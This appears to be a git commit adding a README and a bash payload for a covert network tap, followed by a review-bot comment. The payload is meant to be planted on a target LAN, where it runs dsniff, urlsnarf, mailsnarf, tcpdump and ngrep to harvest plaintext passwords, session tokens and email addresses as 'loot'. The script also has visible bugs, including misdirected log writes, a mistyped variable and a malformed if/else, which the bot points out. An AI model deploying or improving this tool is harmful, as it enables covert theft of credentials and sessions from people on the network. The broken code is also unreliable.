Added "Ispyintel" Payload (#20)

pull/23/merge
InfoSkirmish 2017-11-20 18:13:10 -06:00 committed by Sebastian Kinne
parent 39f9aee74f
commit cd43593044
2 changed files with 245 additions and 0 deletions


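--- a/README_PATH_PLACEHOLDER
+++ b/README_PATH_PLACEHOLDER
@@ -0,0 +1,61 @@
+| | |
+|:----------------|:---------------------------------------------------------------------------------------------------|
+| **Title** | iSpy Passive Intel Gathering |
+| **Description** | Launches various tools to sniff out intel data. Payload will run until the button is pressed. |
+| **Author** | [infoskirmish.com](http://www.infoskirmish.com) |
+| **Version** | 1.0 |
+| **Category** | sniffing |
+| **Target** | Any |
+| **Net Mode** | Any (you choose) |
+| Meaning | Color | Description |
+|:----------|:-----------------:|:----------------------------|
+| SUCCESS: | Blink Green | Payload ended complete |
+| CLEAN UP: | Rapid White | Payload is shutting down |
+| FAIL: | Blink Red | No USB storage found |
+| ATTACK: | Blink Yellow | Payload is loging traffic |
+This payload will automate gathering various recon data on whatever passes between it's Ethernet ports. Since all the data log file names are marked with a unique date stamp you can freely move from target to target deploy, gather, collect, move on without fear you are overwriting previous logs.
+### **Requirements**
++ USB access to store loot.
+### **Setup**
+1. Edit the config variables at the top.
+The main variables are:
+lootPath="/mnt/loot/intel" # Path to loot
+mode="TRANSPARENT" # Network mode we want to use
+interface="br-lan" # Interface to listen on
+2) Copy payload.sh into the ~/payloads/switch<n> folder you wish to deploy on.
+3) Connect into a target machine with access to the LAN.
+4) Set switch to the <n> spot and power up.
+5) Leave, get coffee, take a nap while everything is recorded and parsed for future use.
+6) When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.
+7) When all is done the LED will just go blank. It is now safe to unplug and go about your day.
+### **Tasks that are started**
+| Task | About |
+|:---------|:-----------------------------------------------------------------------------|
+|tcpdump | So you have a record of every packet that was TX and RX |
+|urlsnarf | So you can see all websites that were visited |
+|dsniff | Will attempt to acquire passwords and what not |
+|ngrep | On ports 80 and 21 with the filter for common password fields |
+|ngrep | On ports 80 and 21 with the filter for common session id fields |
+|log.txt | Logs the progress of the payload for easy troubleshooting. |
+### **Clean Up**
+Once completed (aka when the button is pressed) the payload will automatically parse the TCPDump log file for the following items and store the results in separate files. Note the TCPDump raw pcap file is left unharmed and still freely available for your dissecting pleasure.
+As this process can take some time the LED will change to a rapid white blink letting you know the button command was recieved and the payload is in the process of shutting down.
++ ipv4found.txt Will contain a unique list of all the ipv4 which the pcap file contains
++ maybeEmails.txt Is a very loose search for possible email addresses that came across the wire in plain text.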


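--- a/payload.sh
+++ b/payload.sh
@@ -0,0 +1,184 @@
+#!/bin/bash
+#
+# Title: iSpy Passive Intel Gathering
+# Description: Launches various tools to sniff out intel data.
+# Payload will run until the button is pressed.
+# Author: infoskirmish.com
+# Version: 1.0
+# Category: sniffing
+# Target: Any
+# Net Mode: Any (default: Transparent)
+# LEDs
+# SUCCESS: Payload ended complete
+# FAIL: No USB storage found
+lootPath="/mnt/loot/intel" # Path to loot
+mode="TRANSPARENT" # Network mode we want to use
+interface="lo" # Interface to listen on
+Date=$(date +%Y-%m-%d-%H%M) # Date format to use for log files
+dsnifflog="dsniff_$Date.log" # DSNiff log file name
+urlsnifflog="urlsnarf_$Date.log" # URLSniff log file name
+tcpdumplog="tcpdump_$Date.pcap" # TCPDump log file name
+httppwdlog="httpPasswords_$Date.pcap" # Potential HTTP password file name
+sessionidlog="sessionids_$Date.pcap" # Potential Session IDs file name
+mailsnarfLog="mailsnarf_$Date.log" # Mailsnarf data log file path.
+function monitor_space() {
+while true
+do
+[[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && {
+kill $1
+LED G SUCCESS
+sync
+break
+}
+sleep 5
+done
+}
+function finish() {
+# Kill URLSnarff
+echo "URLSnarff ending pid=$1" >> $1/log.txt
+kill $1
+wait $1
+# Kill DNSniff
+echo "DNSniff ending pid=$2" >> $2/log.txt
+kill $2
+wait $2
+# Kill TCPDump
+echo "TCPDump ending pid=$3" >> $3/log.txt
+kill $3
+wait $3
+# Kill HTTP Password NGREP
+echo "HTTP Password NGREP ending pid=$4" >> $4/log.txt
+kill $4
+wait $4
+# Kill Session NGREP
+echo "HTTP Session NGREP ending pid=$5" >> $5/log.txt
+kill $5
+wait $5
+# Kill Mail Snarf
+echo "Mail Snarf ending pid=$6" >> $6/log.txt
+kill $6
+wait $6
+# I found that if this payload had been running awhile the next two steps may take a bit. It is useful to have some kind of indication
+# that the payload accepted your button push and is responding. Thus the rapid white blink.
+LED W VERYFAST
+# Dump all unique IP address from TCP Dump file.
+tcpdump -qns 0 -X -r $lootPath/$tcpdumplog | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | sort | uniq >> $lootPath/ipv4found_$Date.txt
+# Ok this is a really stupid grep pattern matching to search for emails; it is meant to give an over view of what is possible.
+tcpdump -qns 0 -X -r $lootPath/$tcpdumplog | grep -Eiv "[\.]{2}" | grep -oE "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | sort | uniq >> $lootPath/maybeEmails_$Date.txt
+sync
+# Indicate successful shutdown
+LED R SUCCESS
+sleep 1
+# Halt the system; turn off LED
+LED OFF
+halt
+}
+function run() {
+# Create loot directory
+mkdir -p $lootPath &> /dev/null
+# Start tcpdump on the specified interface
+tcpdump -i $interface -w $lootPath/$tcpdumplog &>/dev/null &
+tpid=$!
+# Log TCP Dump Start
+echo "TCPDump started pid=$tpid" >> $lootPath/log.txt
+# Start urlsnarff on the specified interface
+urlsnarf -n -i $interface >> $lootPath/$urlsnifflog &
+urlid=$!
+# Log URL Snarff Start
+echo "URLSnarf started pid=$urlid" >> $lootPath/log.txt
+# Start dsniff on the specified interface
+dsniff -c -m -i $interface -w $lootPath/$dsnifflog &
+dsniffid=$!
+# Log DSNiff Start
+echo "DSNiff started pid=$dsniffid" >> $lootPath/log.txt
+# Log potential plain text user names and passwords on port 80 and 21
+# The thing is port 21 is the defult ftp port. Passwords and user names are exchanged in clear text!!!
+ngrep -d $interface -i "user_pass|userid|pass|pwd|password|login|user_login|usr|USER" -W byline port 80 or port 21 -O $lootPath/$httppwdlog &
+pwdgrep=$!
+# Log Password NGREP Start
+echo "Password NGREP started pid=$pwdgrep" >> $lootPath/log.txt
+# Log potential plain text session ids, tokens, etc.
+ngrep -d $interface -i "session|sessid|token|loggedin|PHPSESSID|CFTOKEN|CFID|JSESSIONID|sessionid" -W byline port 80 or port 21 -O $lootPath/$sessionidlog &
+sessiongrep=$!
+# Log Session NGREP Start
+echo "Session NGREP started pid=$sessiongrep" >> $lootPath/log.txt
+# Log mailsnarf data
+mailsnarf -i $interface $lootPath/$mailsnarflog &
+mailsnarfid=$!
+# Log mailsnarf Start.
+echo "Mailsnarf started pid=$mailsnarfid" >> $lootPath/log.txt
+# Wait for button to be pressed (disable button LED)
+NO_LED=true BUTTON
+finish $urlid $dsniffid $tpid $pwdgrep $sessiongrep $mailsnarfid
+}
+# This payload will only run if we have USB storage
+if [ -d "/mnt/loot" ]; then
+# Set networking to TRANSPARENT mode and wait five seconds
+NETMODE $mode >> $lootPath/log.txt
+sleep 5
+# Lets make sure the interface the user wanted actually exisits.
+if [[ $(ifconfig |grep $interface) ]]; then
+echo "" > $lootPath/log.txt
+LED ATTACK
+run &
+monitor_space $! &
+else
+# Interface could not be found; log it in ~/payload/switch1/log.txt
+ifconfig > $lootPath/log.txt
+echo "Could not load interface $interface. Stopping..." >> $lootPath/log.txt
+# Display FAIL LED
+LED FAIL
+else
+# USB storage could not be found; log it in ~/payload/switch1/log.txt
+echo "Could not load USB storage. Stopping..." > log.txt
+# Display FAIL LED
+LED FAIL
+fi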
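Review bot: The six shutdown log lines in `finish` redirect to `$1/log.txt` … `$6/log.txt`, where each positional parameter is a PID, so they point at a non-existent directory named after the process and the messages are lost; each should read `>> $lootPath/log.txt` like the start-up logging in `run`. At the bottom of the file `monitor_space $!` receives the PID of the backgrounded `run` subshell rather than of any capture process, so on low disk it kills only the wrapper blocked in `BUTTON` while the child tools keep writing and `finish` (and its `sync`/`halt` cleanup) never runs; the child PIDs need to be passed to, or recorded for, the monitor, and `[[ … -lt 10000 ]]` will also error if `df | grep /mnt` returns more than one line. Several values disagree with each other and with the README: `interface="lo"` here versus `br-lan` in the README (the script header says "default: Transparent"), `mailsnarfLog` is declared but `$mailsnarflog` is referenced (shell variables are case-sensitive, so that expansion is empty), and success is signalled as `LED G SUCCESS` in `monitor_space` but `LED R SUCCESS` in `finish` while the README documents green. Quoting the expansions (`"$lootPath/$tcpdumplog"`, `"$interface"`) and replacing `[[ $(ifconfig |grep $interface) ]]` with `[[ -n $(ifconfig | grep -- "$interface") ]]` would also make the file pass ShellCheck, and the USB-missing branch writes `log.txt` into the current directory rather than the path its comment names.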